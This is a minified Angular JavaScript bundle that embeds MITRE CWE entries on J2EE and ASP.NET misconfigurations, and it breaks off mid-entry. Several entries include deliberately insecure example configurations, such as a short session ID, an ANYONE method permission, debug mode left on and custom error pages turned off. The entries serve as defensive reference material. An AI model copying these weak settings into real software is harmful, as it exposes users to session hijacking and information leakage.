n=Ti(3);V("overlapTrigger",!1),C(1),V("ngTemplateOutlet",i.stepTemplate||i.stepTemplateContent||n)("ngTemplateOutletContext",fr(3,Cxe,i.step))}},dependencies:[Ri,_1,Xo,qF,HF,UF,K0e,da,oa],styles:[".tour-step .mat-menu-content{padding:0!important}mat-card[_ngcontent-%COMP%]{min-width:200px}mat-card-actions[_ngcontent-%COMP%]{justify-content:space-between}mat-card-actions[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]{margin:0}mat-card-actions[_ngcontent-%COMP%]   button.prev[_ngcontent-%COMP%]{padding-left:4px}mat-card-actions[_ngcontent-%COMP%]   button.next[_ngcontent-%COMP%]{padding-right:4px}mat-card-title[_ngcontent-%COMP%]{display:flex;align-items:center;justify-content:space-between}mat-card-title[_ngcontent-%COMP%]   .title-text[_ngcontent-%COMP%]{line-height:24px;font-size:22px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}mat-card-title[_ngcontent-%COMP%]   button.close[_ngcontent-%COMP%]{margin:-8px -8px -8px 0}"]}),t})(),Gq=(()=>{class t{static forRoot(){return{ngModule:t,providers:[o5,n5,dT,Gb]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Uq,o8,aA,hp,ib,Uq]}),t})();const Np=JSON.parse('{"5":{"attr":{"@_ID":"5","@_Name":"J2EE Misconfiguration: Data Transmission Without Encryption","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"319","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Modify Application Data"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"The application configuration should ensure that SSL or an encryption mechanism of equivalent strength and vetted reputation is used for all access-controlled pages."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Insecure Transport"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":"If an application uses SSL to guarantee confidential communication with client browsers, the application configuration should make it impossible to view any access controlled page without SSL. There are three common ways for SSL to be bypassed:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["A user manually enters URL and types \\"HTTP\\" rather than \\"HTTPS\\".","Attackers intentionally send a user to an insecure URL.","A programmer erroneously creates a relative link to a page in the application, which does not switch from HTTP to HTTPS. (This is particularly easy to do when the link moves between public and secured areas on a web site.)"]}}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Insecure Transport","attr":{"@_Date":"2008-04-11"}}}},"6":{"attr":{"@_ID":"6","@_Name":"J2EE Misconfiguration: Insufficient Session-ID Length","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The J2EE application is configured to use an insufficient session ID length.","Extended_Description":"If an attacker can guess or steal a session ID, then they may be able to take over the user\'s session (called session hijacking). The number of possible session IDs increases with increased session ID length, making it more difficult to guess or steal a session ID.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"334","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["Session ID\'s can be used to identify communicating parties in a web environment.","The expected number of seconds required to guess a valid session identifier is given by the equation: (2^B+1)/(2*A*S) Where: - B is the number of bits of entropy in the session identifier. - A is the number of guesses an attacker can try each second. - S is the number of valid session identifiers that are valid and available to be guessed at any given time. The number of bits of entropy in the session identifier is always less than the total number of bits in the session identifier. For example, if session identifiers were provided in ascending order, there would be close to zero bits of entropy in the session identifier no matter the identifier\'s length. Assuming that the session identifiers are being generated using a good source of random numbers, we will estimate the number of bits of entropy in a session identifier to be half the total number of bits in the session identifier. For realistic identifier lengths this is possible, though perhaps optimistic."]}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If an attacker can guess an authenticated user\'s session identifier, they can take over the user\'s session."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Session identifiers should be at least 128 bits long to prevent brute-force session guessing. A shorter session identifier leaves the application open to brute-force session guessing attacks."},{"Phase":"Implementation","Description":"A lower bound on the number of valid session identifiers that are available to be guessed is the number of users that are active on a site at any given moment. However, any users that abandon their sessions without logging out will increase this number. (This is one of many good reasons to have a short inactive session timeout.) With a 64 bit session identifier, assume 32 bits of entropy. For a large web site, assume that the attacker can try 1,000 guesses per second and that there are 10,000 valid session identifiers at any given moment. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is less than 4 minutes. Now assume a 128 bit session identifier that provides 64 bits of entropy. With a very large web site, an attacker might try 10,000 guesses per second with 100,000 valid session identifiers available to be guessed. Given these assumptions, the expected time for an attacker to successfully guess a valid session identifier is greater than 292 years."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-47"},"Intro_Text":"The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;sun-web-app&gt;&lt;/sun-web-app&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...&lt;session-config&gt;&lt;/session-config&gt;...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;session-properties&gt;&lt;/session-properties&gt;","xhtml:div":{"#text":"&lt;property name=\\"idLengthBytes\\" value=\\"8\\"&gt;&lt;/property&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;description&gt;The number of bytes in this web module\'s session ID.&lt;/description&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}}},"Body_Text":["This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user\'s session.","Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Insufficient Session-ID Length"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"59"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-482"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Common_Consequences, Enabling_Factors_for_Exploitation, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"7":{"attr":{"@_ID":"7","@_Name":"J2EE Misconfiguration: Missing Custom Error Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The default error page of a web application should not display sensitive information about the software system.","Extended_Description":{"xhtml:p":["A Web application must define a default error page for 4xx errors (e.g. 404), 5xx (e.g. 500) errors and catch java.lang.Throwable exceptions to prevent attackers from mining information from the application container\'s built-in error response.","When an attacker explores a web site looking for vulnerabilities, the amount of information that the site provides is crucial to the eventual success or failure of any attempted attacks."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"756","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"A stack trace might show the attacker a malformed SQL query string, the type of database being used, and the version of the application container. This information enables the attacker to target known vulnerabilities in these components."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Handle exceptions appropriately in source code."},{"Phase":["Implementation","System Configuration"],"Description":"Always define appropriate error pages. The application configuration should specify a default error page in order to guarantee that the application will never leak error messages to an attacker. Handling standard HTTP error codes is useful and user-friendly in addition to being a good security practice, and a good configuration will also define a last-chance error handler that catches any exception that could possibly be thrown by the application."},{"Phase":"Implementation","Description":"Do not attempt to process an error or attempt to mask it."},{"Phase":"Implementation","Description":"Verify return values are correct and do not supply sensitive information about the system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-76"},"Intro_Text":"In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());","attr":{"@_style":"margin-left:10px;"}}]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Missing Error Handling"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-65"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Missing Error Handling","attr":{"@_Date":"2009-03-10"}}}},"8":{"attr":{"@_ID":"8","@_Name":"J2EE Misconfiguration: Entity Bean Declared Remote","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean\'s data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application\'s expectations, potentially leading to other vulnerabilities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Declare Java beans \\"local\\" when possible. When a bean must be remotely accessible, make sure that sensitive information is not exposed, and ensure that the application logic performs appropriate validation of any data that might be modified by an attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;ejb-jar&gt;&lt;/ejb-jar&gt;","xhtml:div":{"#text":"&lt;enterprise-beans&gt;&lt;/enterprise-beans&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;entity&gt;&lt;/entity&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;ejb-name&gt;EmployeeRecord&lt;/ejb-name&gt;&lt;home&gt;com.wombat.empl.EmployeeRecordHome&lt;/home&gt;&lt;remote&gt;com.wombat.empl.EmployeeRecord&lt;/remote&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Unsafe Bean Declaration"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Entity beans that expose a remote interface become part of an application\'s attack surface. For performance reasons, an application should rarely use remote entity beans, so there is a good chance that a remote entity bean declaration is an error.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"9":{"attr":{"@_ID":"9","@_Name":"J2EE Misconfiguration: Weak Access Permissions for EJB Methods","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the software system.","Extended_Description":"If the EJB deployment descriptor contains one or more method permissions that grant access to the special ANYONE role, it indicates that access control for the application has not been fully thought through or that the application is structured in such a way that reasonable access control restrictions are impossible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Follow the principle of least privilege when assigning access rights to EJB methods. Permission to invoke EJB methods should not be granted to the ANYONE role."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following deployment descriptor grants ANYONE permission to invoke the Employee EJB\'s method named getSalary().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;ejb-jar&gt;&lt;/ejb-jar&gt;","xhtml:div":{"#text":"...&lt;assembly-descriptor&gt;&lt;/assembly-descriptor&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"&lt;method-permission&gt;&lt;/method-permission&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;role-name&gt;ANYONE&lt;/role-name&gt;&lt;method&gt;&lt;ejb-name&gt;Employee&lt;/ejb-name&gt;&lt;method-name&gt;getSalary&lt;/method-name&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Misconfiguration: Weak Access Permissions"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Weak Access Permissions","attr":{"@_Date":"2008-04-11"}}}},"11":{"attr":{"@_ID":"11","@_Name":"ASP.NET Misconfiguration: Creating Debug Binary","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Debugging messages help attackers learn about the system and plan a form of attack.","Extended_Description":"ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"489","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The debug attribute of the &lt;compilation&gt; tag defines whether compiled binaries should include debugging information. The use of debug binaries causes an application to provide as much information about itself as possible to the user."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Build and Compilation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers can leverage the additional information they gain from debugging output to mount attacks targeted on the framework, database, or other resources used by the application."}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Avoid releasing debug binaries into the production environment. Change the debug mode to false when the application is deployed into production."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The file web.config contains the debug mode setting. Setting debug to \\"true\\" will let the browser display debugging information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\" encoding=\\"utf-8\\" ?&gt;&lt;configuration&gt;&lt;/configuration&gt;","xhtml:br":"","xhtml:div":{"#text":"&lt;system.web&gt;&lt;/system.web&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;compilationdefaultLanguage=\\"c#\\"debug=\\"true\\"/&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}},"Body_Text":"Change the debug mode to false when the application is deployed into production."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Creating Debug Binary"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Time_of_Introduction"}]}},"12":{"attr":{"@_ID":"12","@_Name":"ASP.NET Misconfiguration: Missing Custom Error Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework\'s built-in responses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"756","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The mode attribute of the &lt;customErrors&gt; tag defines whether custom or default error pages are used."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Default error pages gives detailed information about the error that occurred, and should not be used in production environments. Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Handle exceptions appropriately in source code. ASP .NET applications should be configured to use custom error pages instead of the framework default page."},{"Phase":"Architecture and Design","Description":"Do not attempt to process an error or attempt to mask it."},{"Phase":"Implementation","Description":"Verify return values are correct and do not supply sensitive information about the system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-75"},"Intro_Text":"The mode attribute of the &lt;customErrors&gt; tag in the Web.config file defines whether custom or default error pages are used.","Body_Text":["In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.","A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.","Another secure option is to set the mode attribute of the &lt;customErrors&gt; tag to use a custom page as follows:"],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"Off\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"RemoteOnly\\" /&gt;"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"&lt;customErrors mode=\\"On\\" defaultRedirect=\\"YourErrorPage.htm\\" /&gt;"}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Missing Custom Error Handling"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-65"}},{"attr":{"@_External_Reference_ID":"REF-66"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, 